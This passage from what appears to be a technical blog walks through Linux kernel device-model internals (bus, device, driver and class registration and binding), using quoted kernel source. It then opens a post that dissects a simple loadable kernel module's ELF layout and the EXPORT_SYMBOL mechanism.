env->envp, UMH_WAIT_EXEC);
}
exit:
kfree(devpath);
kfree(env);
return retval;
}
</code></pre></div></div>
<p>Generally, there are three steps in kobject_uevent_env.
Firstly, find the top kset, then call the filter of kset->uevent_ops.
Secondly, set the environment variable and call uevent_ops->uevent.
Finally, according the definition of CONFIG_NET it will send uevent message to userspace using netlink, or call the call_usermodehelper function to launch a userprocess from kernel.</p>
<h2 id="bus">bus</h2>
<p>Bus is one of the core concept in linux device driver. Devices and drivers is around of bus. Bus is a very low level infrastructure that device driver programmer have nearly chance to write a bus. A bus can be both backed by a physical bus such as PCI bus or just a virtual concept bus such as virtio bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct bus_type {
const char *name;
const char *dev_name;
struct device *dev_root;
struct device_attribute *dev_attrs; /* use dev_groups instead */
const struct attribute_group **bus_groups;
const struct attribute_group **dev_groups;
const struct attribute_group **drv_groups;
int (*match)(struct device *dev, struct device_driver *drv);
int (*uevent)(struct device *dev, struct kobj_uevent_env *env);
int (*probe)(struct device *dev);
int (*remove)(struct device *dev);
void (*shutdown)(struct device *dev);
int (*online)(struct device *dev);
int (*offline)(struct device *dev);
int (*suspend)(struct device *dev, pm_message_t state);
int (*resume)(struct device *dev);
const struct dev_pm_ops *pm;
struct iommu_ops *iommu_ops;
struct subsys_private *p;
struct lock_class_key lock_key;
};
</code></pre></div></div>
<p>‘match’ was called whenever a new device or driver is added for this bus.
the ‘p’, struct subsys_private is used to manage the devices and drivers in this bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct subsys_private {
struct kset subsys;
struct kset *devices_kset;
struct list_head interfaces;
struct mutex mutex;
struct kset *drivers_kset;
struct klist klist_devices;
struct klist klist_drivers;
struct blocking_notifier_head bus_notifier;
unsigned int drivers_autoprobe:1;
struct bus_type *bus;
struct kset glue_dirs;
struct class *class;
};
</code></pre></div></div>
<p>’ subsys’ represents the subsystem of the bus lies, every bus in system through bus_register will be has the same bus_kset, so bus_kset is the container of all buses in the system.
‘devices_kset’ represents all the devices’ kset, and ‘drivers_kset’ represents all the drivers’s kset.
‘klist_devices’ and ‘klist_drivers’ links the devices and drivers in this bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bus_type
+--------+
| name | bus_kset
+--------+ +--------------+
| | | |kobj| |
+--------+ +--------------+
| | ^
+--------+ | dri^ers_kset
| p | subsys_pri^ate | +--------------+
+--+-----+---> +---------------+ | | |kobj| |
^ | subsys +-----+ +--------------+
| +---------------+ ^
| | drivers_kset +----------+
| +---------------+ de^ices_kset
| | devices_kset +--------------> +--------------+
| +---------------+ | |kobj| |
| | klist_devices +-------+ de^ +--------------+
| +---------------+ <----+ +----+ +----+
| | klist_drivers +--+ | +----> | +----> | |
| +---------------+ | +----+ +----+ +----+
| | | | drv
| +---------------+ +--> +----+ +----+ +----+
+-----------+ bus | | +----> | +----> | |
+---------------+ +----+ +----+ +----+
</code></pre></div></div>
<p>‘bus_register’ is used to register a bus to the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int bus_register(struct bus_type *bus)
{
int retval;
struct subsys_private *priv;
struct lock_class_key *key = &bus->lock_key;
priv = kzalloc(sizeof(struct subsys_private), GFP_KERNEL);
if (!priv)
return -ENOMEM;
priv->bus = bus;
bus->p = priv;
BLOCKING_INIT_NOTIFIER_HEAD(&priv->bus_notifier);
retval = kobject_set_name(&priv->subsys.kobj, "%s", bus->name);
if (retval)
goto out;
priv->subsys.kobj.kset = bus_kset;
priv->subsys.kobj.ktype = &bus_ktype;
priv->drivers_autoprobe = 1;
retval = kset_register(&priv->subsys);
if (retval)
goto out;
retval = bus_create_file(bus, &bus_attr_uevent);
if (retval)
goto bus_uevent_fail;
priv->devices_kset = kset_create_and_add("devices", NULL,
&priv->subsys.kobj);
if (!priv->devices_kset) {
retval = -ENOMEM;
goto bus_devices_fail;
}
priv->drivers_kset = kset_create_and_add("drivers", NULL,
&priv->subsys.kobj);
if (!priv->drivers_kset) {
retval = -ENOMEM;
goto bus_drivers_fail;
}
INIT_LIST_HEAD(&priv->interfaces);
__mutex_init(&priv->mutex, "subsys mutex", key);
klist_init(&priv->klist_devices, klist_devices_get, klist_devices_put);
klist_init(&priv->klist_drivers, NULL, NULL);
retval = add_probe_files(bus);
if (retval)
goto bus_probe_files_fail;
retval = bus_add_groups(bus, bus->bus_groups);
if (retval)
goto bus_groups_fail;
pr_debug("bus: '%s': registered\n", bus->name);
return 0;
...
return retval;
}
</code></pre></div></div>
<p>First, ‘kset_register’ create a directory in /sys/bus, for example, /sys/bus/pci.
Then create two directory —-devices and drivers—-in /sys/bus/$bus using ‘kset_create_and_add’. For example /sys/bus/pci/devices and /sys/bus/pci/drivers.</p>
<p>Bus’ attributes represnet the information and configuration about the bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bus_create_file(bus, &bus_attr_uevent);
</code></pre></div></div>
<p>BUS_ATTR is used to create bus attributes:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static BUS_ATTR(uevent, S_IWUSR, NULL, bus_uevent_store);
#define BUS_ATTR(_name, _mode, _show, _store) \
struct bus_attribute bus_attr_##_name = __ATTR(_name, _mode, _show, _store)
#define BUS_ATTR_RW(_name) \
struct bus_attribute bus_attr_##_name = __ATTR_RW(_name)
#define BUS_ATTR_RO(_name) \
struct bus_attribute bus_attr_##_name = __ATTR_RO(_name)
</code></pre></div></div>
<p>User space can read and write these attributes to inspect and control the bus’s behavior.</p>
<h3 id="binding-the-device-and-driver">binding the device and driver</h3>
<p>Connecting a device to its corresponding driver is called binding. The bus does a lot of work to bind devices and drivers behind the scenes, hidden from the device driver programmer. Two events can trigger a bind. When a device is registered on a bus by device_register, the kernel tries to bind this device against every driver registered on that bus. When a driver is registered on a bus by driver_register, the kernel tries to bind this driver against every device registered on that bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int device_bind_driver(struct device *dev)
{
int ret;
ret = driver_sysfs_add(dev);
if (!ret)
driver_bound(dev);
return ret;
}
static void driver_bound(struct device *dev)
{
if (klist_node_attached(&dev->p->knode_driver)) {
printk(KERN_WARNING "%s: device %s already bound\n",
__func__, kobject_name(&dev->kobj));
return;
}
pr_debug("driver: '%s': %s: bound to device '%s'\n", dev_name(dev),
__func__, dev->driver->name);
klist_add_tail(&dev->p->knode_driver, &dev->driver->p->klist_devices);
/*
* Make sure the device is no longer in one of the deferred lists and
* kick off retrying all pending devices
*/
driver_deferred_probe_del(dev);
driver_deferred_probe_trigger();
if (dev->bus)
blocking_notifier_call_chain(&dev->bus->p->bus_notifier,
BUS_NOTIFY_BOUND_DRIVER, dev);
}
</code></pre></div></div>
<p>device_register eventually calls driver_bound to bind the device to its driver.
It links the device private’s knode_driver field into the driver private’s klist_devices list.</p>
<h2 id="device">device</h2>
<p>Linux uses struct device to represent a device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct device {
struct device *parent;
struct device_private *p;
struct kobject kobj;
const char *init_name; /* initial name of the device */
const struct device_type *type;
struct mutex mutex; /* mutex to synchronize calls to
* its driver.
*/
struct bus_type *bus; /* type of bus device is on */
struct device_driver *driver; /* which driver has allocated this
device */
void *platform_data; /* Platform specific data, device
core doesn't touch it */
struct dev_pm_info power;
struct dev_pm_domain *pm_domain;
#ifdef CONFIG_PINCTRL
struct dev_pin_info *pins;
#endif
#ifdef CONFIG_NUMA
int numa_node; /* NUMA node this device is close to */
#endif
u64 *dma_mask; /* dma mask (if dma'able device) */
u64 coherent_dma_mask;/* Like dma_mask, but for
alloc_coherent mappings as
not all hardware supports
64 bit addresses for consistent
allocations such descriptors. */
struct device_dma_parameters *dma_parms;
struct list_head dma_pools; /* dma pools (if dma'ble) */
struct dma_coherent_mem *dma_mem; /* internal for coherent mem
override */
#ifdef CONFIG_DMA_CMA
struct cma *cma_area; /* contiguous memory area for dma
allocations */
#endif
/* arch specific additions */
struct dev_archdata archdata;
struct device_node *of_node; /* associated device tree node */
struct acpi_dev_node acpi_node; /* associated ACPI device node */
dev_t devt; /* dev_t, creates the sysfs "dev" */
u32 id; /* device instance */
spinlock_t devres_lock;
struct list_head devres_head;
struct klist_node knode_class;
struct class *class;
const struct attribute_group **groups; /* optional groups */
void (*release)(struct device *dev);
struct iommu_group *iommu_group;
bool offline_disabled:1;
bool offline:1;
};
</code></pre></div></div>
<p>‘parent’ points to the parent device.
‘kobj’ represents the device’s kobject in the kernel.
‘driver’ indicates whether this device has been bound to a driver; if it is NULL, no driver has been found for this device.</p>
<p>Every device in the system is an object of struct device, so the kernel uses a kset, devices_kset, as the container of all devices. The kernel classifies devices into two categories, block and char. Each category has a kobject, sysfs_dev_block_kobj and sysfs_dev_char_kobj. They are initialized in ‘devices_init’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __init devices_init(void)
{
devices_kset = kset_create_and_add("devices", &device_uevent_ops, NULL);
if (!devices_kset)
return -ENOMEM;
dev_kobj = kobject_create_and_add("dev", NULL);
if (!dev_kobj)
goto dev_kobj_err;
sysfs_dev_block_kobj = kobject_create_and_add("block", dev_kobj);
if (!sysfs_dev_block_kobj)
goto block_kobj_err;
sysfs_dev_char_kobj = kobject_create_and_add("char", dev_kobj);
if (!sysfs_dev_char_kobj)
goto char_kobj_err;
return 0;
char_kobj_err:
kobject_put(sysfs_dev_block_kobj);
block_kobj_err:
kobject_put(dev_kobj);
dev_kobj_err:
kset_unregister(devices_kset);
return -ENOMEM;
}
</code></pre></div></div>
<p>So this function creates the following directories: /sys/devices, /sys/dev, /sys/dev/block and /sys/dev/char.</p>
<p>device_register is used to register a device with the system. It first calls device_initialize to initialize some fields of the device and then calls device_add.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int device_register(struct device *dev)
{
device_initialize(dev);
return device_add(dev);
}
void device_initialize(struct device *dev)
{
dev->kobj.kset = devices_kset;
kobject_init(&dev->kobj, &device_ktype);
INIT_LIST_HEAD(&dev->dma_pools);
mutex_init(&dev->mutex);
lockdep_set_novalidate_class(&dev->mutex);
spin_lock_init(&dev->devres_lock);
INIT_LIST_HEAD(&dev->devres_head);
device_pm_init(dev);
set_dev_node(dev, -1);
}
</code></pre></div></div>
<p>‘device_add’ does a lot of work.
First it builds the device’s topology in sysfs:
1) If both ‘dev->class’ and ‘dev->parent’ are NULL and the device is attached to a bus, the parent kobject is the bus’s root device:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (!parent && dev->bus && dev->bus->dev_root)
return &dev->bus->dev_root->kobj;
</code></pre></div></div>
<p>2) If ‘dev->class’ is NULL and ‘dev->parent’ is not NULL: the easy case, the device’s directory is created under ‘dev->parent->kobj’.</p>
<p>3) If ‘dev->class’ is not NULL and ‘dev->parent’ is NULL, the device’s directory is created under /sys/devices/virtual.</p>
<p>4) If both ‘dev->class’ and ‘dev->parent’ are not NULL: the most complicated case, omitted here.</p>
<p>Second, it creates some attribute files for this device. If the device’s major number is not zero, it calls ‘devtmpfs_create_node’ to create a node in devtmpfs.</p>
<p>Then it tries to bind the device to the drivers registered on the bus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void bus_probe_device(struct device *dev)
{
struct bus_type *bus = dev->bus;
struct subsys_interface *sif;
int ret;
if (!bus)
return;
if (bus->p->drivers_autoprobe) {
ret = device_attach(dev);
WARN_ON(ret < 0);
}
mutex_lock(&bus->p->mutex);
list_for_each_entry(sif, &bus->p->interfaces, node)
if (sif->add_dev)
sif->add_dev(dev, sif);
mutex_unlock(&bus->p->mutex);
}
int device_attach(struct device *dev)
{
int ret = 0;
device_lock(dev);
if (dev->driver) {
if (klist_node_attached(&dev->p->knode_driver)) {
ret = 1;
goto out_unlock;
}
ret = device_bind_driver(dev);
if (ret == 0)
ret = 1;
else {
dev->driver = NULL;
ret = 0;
}
} else {
ret = bus_for_each_drv(dev->bus, NULL, dev, __device_attach);
pm_request_idle(dev);
}
out_unlock:
device_unlock(dev);
return ret;
}
</code></pre></div></div>
<p>If the device already has a driver, we just need to call ‘device_bind_driver’ to establish the relationship between device and driver.
If the device has no driver, we iterate over every driver on ‘dev->bus’ and call ‘__device_attach’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __device_attach(struct device_driver *drv, void *data)
{
struct device *dev = data;
if (!driver_match_device(drv, dev))
return 0;
return driver_probe_device(drv, dev);
}
static inline int driver_match_device(struct device_driver *drv,
struct device *dev)
{
return drv->bus->match ? drv->bus->match(dev, drv) : 1;
}
</code></pre></div></div>
<p>If the driver’s bus defines a match method, it is called: a return value of 1 means the pair matches, 0 means it does not. If no match method is defined, everything matches.
If the device and the driver match, ‘driver_probe_device’ is called to bind them:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int driver_probe_device(struct device_driver *drv, struct device *dev)
{
int ret = 0;
if (!device_is_registered(dev))
return -ENODEV;
pr_debug("bus: '%s': %s: matched device %s with driver %s\n",
drv->bus->name, __func__, dev_name(dev), drv->name);
pm_runtime_barrier(dev);
ret = really_probe(dev, drv);
pm_request_idle(dev);
return ret;
}
static int really_probe(struct device *dev, struct device_driver *drv)
{
int ret = 0;
atomic_inc(&probe_count);
pr_debug("bus: '%s': %s: probing driver %s with device %s\n",
drv->bus->name, __func__, drv->name, dev_name(dev));
WARN_ON(!list_empty(&dev->devres_head));
dev->driver = drv;
/* If using pinctrl, bind pins now before probing */
ret = pinctrl_bind_pins(dev);
if (ret)
goto probe_failed;
if (driver_sysfs_add(dev)) {
printk(KERN_ERR "%s: driver_sysfs_add(%s) failed\n",
__func__, dev_name(dev));
goto probe_failed;
}
if (dev->bus->probe) {
ret = dev->bus->probe(dev);
if (ret)
goto probe_failed;
} else if (drv->probe) {
ret = drv->probe(dev);
if (ret)
goto probe_failed;
}
driver_bound(dev);
ret = 1;
pr_debug("bus: '%s': %s: bound device %s to driver %s\n",
drv->bus->name, __func__, dev_name(dev), drv->name);
...
}
</code></pre></div></div>
<p>If the device’s bus defines a probe method it is called; otherwise the driver’s probe function is called.
Finally ‘driver_bound’ is called to establish the relationship.</p>
<h2 id="driver">driver</h2>
<p>struct device_driver represents a device driver.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct device_driver {
const char *name;
struct bus_type *bus;
struct module *owner;
const char *mod_name; /* used for built-in modules */
bool suppress_bind_attrs; /* disables bind/unbind via sysfs */
const struct of_device_id *of_match_table;
const struct acpi_device_id *acpi_match_table;
int (*probe) (struct device *dev);
int (*remove) (struct device *dev);
void (*shutdown) (struct device *dev);
int (*suspend) (struct device *dev, pm_message_t state);
int (*resume) (struct device *dev);
const struct attribute_group **groups;
const struct dev_pm_ops *pm;
struct driver_private *p;
};
</code></pre></div></div>
<p>‘driver_find’ is used to find a driver on a bus.
‘driver_register’ is used to register a driver with the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int driver_register(struct device_driver *drv)
{
int ret;
struct device_driver *other;
BUG_ON(!drv->bus->p);
if ((drv->bus->probe && drv->probe) ||
(drv->bus->remove && drv->remove) ||
(drv->bus->shutdown && drv->shutdown))
printk(KERN_WARNING "Driver '%s' needs updating - please use "
"bus_type methods\n", drv->name);
other = driver_find(drv->name, drv->bus);
if (other) {
printk(KERN_ERR "Error: Driver '%s' is already registered, "
"aborting...\n", drv->name);
return -EBUSY;
}
ret = bus_add_driver(drv);
if (ret)
return ret;
ret = driver_add_groups(drv, drv->groups);
if (ret) {
bus_remove_driver(drv);
return ret;
}
kobject_uevent(&drv->p->kobj, KOBJ_ADD);
return ret;
}
int bus_add_driver(struct device_driver *drv)
{
struct bus_type *bus;
struct driver_private *priv;
int error = 0;
bus = bus_get(drv->bus);
if (!bus)
return -EINVAL;
pr_debug("bus: '%s': add driver %s\n", bus->name, drv->name);
priv = kzalloc(sizeof(*priv), GFP_KERNEL);
if (!priv) {
error = -ENOMEM;
goto out_put_bus;
}
klist_init(&priv->klist_devices, NULL, NULL);
priv->driver = drv;
drv->p = priv;
priv->kobj.kset = bus->p->drivers_kset;
error = kobject_init_and_add(&priv->kobj, &driver_ktype, NULL,
"%s", drv->name);
if (error)
goto out_unregister;
klist_add_tail(&priv->knode_bus, &bus->p->klist_drivers);
if (drv->bus->p->drivers_autoprobe) {
error = driver_attach(drv);
if (error)
goto out_unregister;
}
module_add_driver(drv->owner, drv);
error = driver_create_file(drv, &driver_attr_uevent);
if (error) {
printk(KERN_ERR "%s: uevent attr (%s) failed\n",
__func__, drv->name);
}
error = driver_add_groups(drv, bus->drv_groups);
if (error) {
/* How the hell do we get out of this pickle? Give up */
printk(KERN_ERR "%s: driver_create_groups(%s) failed\n",
__func__, drv->name);
}
if (!drv->suppress_bind_attrs) {
error = add_bind_files(drv);
if (error) {
/* Ditto */
printk(KERN_ERR "%s: add_bind_files(%s) failed\n",
__func__, drv->name);
}
}
return 0;
out_unregister:
kobject_put(&priv->kobj);
kfree(drv->p);
drv->p = NULL;
out_put_bus:
bus_put(bus);
return error;
}
</code></pre></div></div>
<p>‘bus_add_driver’ does the real work: it first allocates and initializes a ‘driver_private’ struct.
It then calls ‘driver_attach’, which invokes ‘__driver_attach’ for every device on the bus:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __driver_attach(struct device *dev, void *data)
{
struct device_driver *drv = data;
/*
* Lock device and try to bind to it. We drop the error
* here and always return 0, because we need to keep trying
* to bind to devices and some drivers will return an error
* simply if it didn't support the device.
*
* driver_probe_device() will spit a warning if there
* is an error.
*/
if (!driver_match_device(drv, dev))
return 0;
if (dev->parent) /* Needed for USB */
device_lock(dev->parent);
device_lock(dev);
if (!dev->driver)
driver_probe_device(drv, dev);
device_unlock(dev);
if (dev->parent)
device_unlock(dev->parent);
return 0;
}
</code></pre></div></div>
<p>In ‘__driver_attach’, it calls both ‘driver_match_device’ and ‘driver_probe_device’, just as ‘__device_attach’ does.</p>
<p>‘bus_add_driver’ will also create some attribute files.</p>
<h2 id="class">class</h2>
<p>A class is a higher-level abstraction of devices: it groups devices according to their functionality.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct class {
const char *name;
struct module *owner;
struct class_attribute *class_attrs;
const struct attribute_group **dev_groups;
struct kobject *dev_kobj;
int (*dev_uevent)(struct device *dev, struct kobj_uevent_env *env);
char *(*devnode)(struct device *dev, umode_t *mode);
void (*class_release)(struct class *class);
void (*dev_release)(struct device *dev);
int (*suspend)(struct device *dev, pm_message_t state);
int (*resume)(struct device *dev);
const struct kobj_ns_type_operations *ns_type;
const void *(*namespace)(struct device *dev);
const struct dev_pm_ops *pm;
struct subsys_private *p;
};
</code></pre></div></div>
<p>‘classes_init’ creates the class root directory, /sys/class, in sysfs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __init classes_init(void)
{
class_kset = kset_create_and_add("class", NULL, NULL);
if (!class_kset)
return -ENOMEM;
return 0;
}
</code></pre></div></div>
<p>A class is created using ‘class_create’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define class_create(owner, name) \
({ \
static struct lock_class_key __key; \
__class_create(owner, name, &__key); \
})
struct class *__class_create(struct module *owner, const char *name,
struct lock_class_key *key)
{
struct class *cls;
int retval;
cls = kzalloc(sizeof(*cls), GFP_KERNEL);
if (!cls) {
retval = -ENOMEM;
goto error;
}
cls->name = name;
cls->owner = owner;
cls->class_release = class_create_release;
retval = __class_register(cls, key);
if (retval)
goto error;
return cls;
error:
kfree(cls);
return ERR_PTR(retval);
}
EXPORT_SYMBOL_GPL(__class_create);
</code></pre></div></div>
<p>Again, ‘__class_register’ does the tough work. Its most important job is to create a directory under /sys/class.</p>
<p>Let’s see how the class affects device creation.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct device *device_create(struct class *class, struct device *parent,
dev_t devt, void *drvdata, const char *fmt, ...)
{
va_list vargs;
struct device *dev;
va_start(vargs, fmt);
dev = device_create_vargs(class, parent, devt, drvdata, fmt, vargs);
va_end(vargs);
return dev;
}
static struct device *
device_create_groups_vargs(struct class *class, struct device *parent,
dev_t devt, void *drvdata,
const struct attribute_group **groups,
const char *fmt, va_list args)
{
struct device *dev = NULL;
int retval = -ENODEV;
if (class == NULL || IS_ERR(class))
goto error;
dev = kzalloc(sizeof(*dev), GFP_KERNEL);
if (!dev) {
retval = -ENOMEM;
goto error;
}
dev->devt = devt;
dev->class = class;
dev->parent = parent;
dev->groups = groups;
dev->release = device_create_release;
dev_set_drvdata(dev, drvdata);
retval = kobject_set_name_vargs(&dev->kobj, fmt, args);
if (retval)
goto error;
retval = device_register(dev);
if (retval)
goto error;
return dev;
error:
put_device(dev);
return ERR_PTR(retval);
}
</code></pre></div></div>
<p>Here we see that ‘dev->class’ is set to the class. As discussed for ‘device_register’, the class and the parent both influence where the device’s directory is placed in sysfs.</p>
Anatomy of the Linux loadable kernel module2018-06-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/02/linux-loadable-module
<p>Loadable modules play a very important role in modern applications and operating systems. Nearly all processes need loadable modules, for example .so files on Linux and .dll files on Windows. Operating systems also benefit from loadable modules: Linux can insert a .ko driver file into the running kernel, and Windows has a corresponding mechanism. This article digs into the anatomy of the Linux loadable kernel module. We will use the very simple loadable kernel module below to guide our discussion.</p>
<p>hello.c:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <linux/kernel.h>
#include <linux/module.h>
int testexport(void)
{
printk("in testexport\n");
}
EXPORT_SYMBOL(testexport);
int hello_init(void) {
int i;
printk(KERN_INFO "Hello World!\n");
return 0;
}
void hello_exit(void) {
printk(KERN_INFO "Bye World!\n");
}
module_init(hello_init);
module_exit(hello_exit);
</code></pre></div></div>
<p>Below is the Makefile:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-m += hello.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
</code></pre></div></div>
<p>When we compile the kernel module, a hello.ko file is generated. Inserting the .ko into the kernel with “insmod hello.ko” prints “Hello World” in dmesg, and removing it with “rmmod hello” prints “Bye World”.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[469345.236572] Hello World!
[469356.544498] Bye World!
</code></pre></div></div>
<h1 id="file-format">File Format</h1>
<p>A .ko is an ELF file. ELF stands for “Executable and Linking Format”, the standard executable file format on Linux.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># file hello.ko
hello.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=28772d0d39be18e530b2b788dbf79acfabf189d6, not stripped
</code></pre></div></div>
<p>The diagram below lays out the typical .ko file format on disk.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>e_shoff +------------------+
+----+ ELF header |
| +------------------+ <------+
| | | |
| | section 1 | |
| | | |
| +------------------+ |
| | section 2 | <---+ |
| +------------------+ | |
| | section 3 | <+ | |
+--> +------------------+ | | |
| section header 1 +--------+
+------------------+ | |
| section header 2 +-----+
+------------------+ | sh_offset
| section header 3 +--+
+------------------+
</code></pre></div></div>
<p>In general, a static ELF file contains three portions: the ELF header, several sections, and the section header table at the end. Notice that we omit the optional program header table here, as the .ko doesn’t use it.</p>
<h2 id="elf-header">ELF header</h2>
<p>The ELF header describes the overall information of the file and lies at the very beginning of it. We can use readelf to read the header.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># readelf -h hello.ko
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: REL (Relocatable file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0x0
Start of program headers: 0 (bytes into file)
Start of section headers: 285368 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 0 (bytes)
Number of program headers: 0
Size of section headers: 64 (bytes)
Number of section headers: 33
Section header string table index: 3
</code></pre></div></div>
<p>Use the hexdump we can see the raw data.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0000000 457f 464c 0102 0001 0000 0000 0000 0000
0000010 0001 003e 0001 0000 0000 0000 0000 0000
0000020 0000 0000 0000 0000 5ab8 0004 0000 0000
0000030 0000 0000 0040 0000 0000 0040 0021 0020
</code></pre></div></div>
<p>Structure represented:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct
{
unsigned char e_ident[16]; /* ELF identification */
Elf64_Half e_type; /* Object file type */
Elf64_Half e_machine; /* Machine type */
Elf64_Word e_version; /* Object file version */
Elf64_Addr e_entry; /* Entry point address */
Elf64_Off e_phoff; /* Program header offset */
Elf64_Off e_shoff; /* Section header offset */
Elf64_Word e_flags; /* Processor-specific flags */
Elf64_Half e_ehsize; /* ELF header size */
Elf64_Half e_phentsize; /* Size of program header entry */
Elf64_Half e_phnum; /* Number of program header entries */
Elf64_Half e_shentsize; /* Size of section header entry */
Elf64_Half e_shnum; /* Number of section header entries */
Elf64_Half e_shstrndx; /* Section name string table index */
} Elf64_Ehdr;
</code></pre></div></div>
<p>The comments describe each field’s meaning.</p>
<h2 id="sections">Sections</h2>
<p>The sections lie after the ELF header and occupy most of the space of the ELF file. Each section holds actual data of the file. For example, the .text section contains the code the program executes, and the .data section contains the data the program uses. There may be a lot of sections; even our very simple hello-world module has 33. When the operating system loads an ELF file into memory, some sections are grouped together into a segment, and some sections may be omitted, meaning they are not loaded into memory at all.</p>
<h2 id="section-header-tables">Section header tables</h2>
<p>The section header table lies at the tail of the ELF file. It is the metadata of the sections: each entry describes the corresponding section, for example where the section starts in the ELF file and its size.</p>
<h1 id="export_symbol-internals">EXPORT_SYMBOL internals</h1>
<p>When we write applications in user space, we often use library functions such as ‘printf’ and ‘malloc’. We don’t need to write these functions ourselves as they are provided by the glibc library. Likewise, in kernel space, a kernel module often needs to use the kernel’s functions to complete its work, for example ‘printk’ to print something. For static linking, the compiler can solve this reference problem, but for dynamic module loading the kernel must do it by itself; this is called resolving “unresolved references”. Essentially, processing an unresolved reference means determining the actual address of each symbol the kernel module uses. So there must be somewhere the kernel exports these symbols. In the Linux kernel, this is done by the EXPORT_SYMBOL macro, so let’s look at how symbols are exported through EXPORT_SYMBOL.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><include/linux/export.h>
/* For every exported symbol, place a struct in the __ksymtab section */
#define __EXPORT_SYMBOL(sym, sec) \
extern typeof(sym) sym; \
__CRC_SYMBOL(sym, sec) \
static const char __kstrtab_##sym[] \
__attribute__((section("__ksymtab_strings"), aligned(1))) \
= VMLINUX_SYMBOL_STR(sym); \
extern const struct kernel_symbol __ksymtab_##sym; \
__visible const struct kernel_symbol __ksymtab_##sym \
__used \
__attribute__((section("___ksymtab" sec "+" #sym), unused)) \
= { (unsigned long)&sym, __kstrtab_##sym }
#define EXPORT_SYMBOL(sym) \
__EXPORT_SYMBOL(sym, "")
#define EXPORT_SYMBOL_GPL(sym) \
__EXPORT_SYMBOL(sym, "_gpl")
#define EXPORT_SYMBOL_GPL_FUTURE(sym) \
__EXPORT_SYMBOL(sym, "_gpl_future"
</code></pre></div></div>
<p>This shows the EXPORT_SYMBOL definition. Though it looks complicated, we can use our example to instantiate it. Consider our EXPORT_SYMBOL(testexport). After expanding the macro we get the following (the __CRC_SYMBOL(sym, sec) part is left for later):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const char __kstrtab_testexport[] = "testexport";
const struct kernel_symbol __ksymtab_testexport =
{(unsigned long)&testexport, __kstrtab_testexport}
The second variable's type, kernel_symbol, is defined as:
struct kernel_symbol
{
unsigned long value;
const char *name;
};
</code></pre></div></div>
<p>So here we can see that EXPORT_SYMBOL just defines variables: ‘value’ is the address of the symbol in memory and ‘name’ is the name of the symbol. Unlike an ordinary definition, the exported function’s name is stored in the section “__ksymtab_strings”, and the kernel_symbol variable is stored in the section “___ksymtab+testexport”. If you look at the ELF file’s sections, you will not find a “___ksymtab+testexport” section: it is merged into “__ksymtab” by <scripts/module-common.lds>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SECTIONS {
/DISCARD/ : { *(.discard) }
__ksymtab : { *(SORT(___ksymtab+*)) }
__ksymtab_gpl : { *(SORT(___ksymtab_gpl+*)) }
__ksymtab_unused : { *(SORT(___ksymtab_unused+*)) }
__ksymtab_unused_gpl : { *(SORT(___ksymtab_unused_gpl+*)) }
__ksymtab_gpl_future : { *(SORT(___ksymtab_gpl_future+*)) }
__kcrctab : { *(SORT(___kcrctab+*)) }
__kcrctab_gpl : { *(SORT(___kcrctab_gpl+*)) }
__kcrctab_unused : { *(SORT(___kcrctab_unused+*)) }
__kcrctab_unused_gpl : { *(SORT(___kcrctab_unused_gpl+*)) }
__kcrctab_gpl_future : { *(SORT(___kcrctab_gpl_future+*)) }
}
</code></pre></div></div>
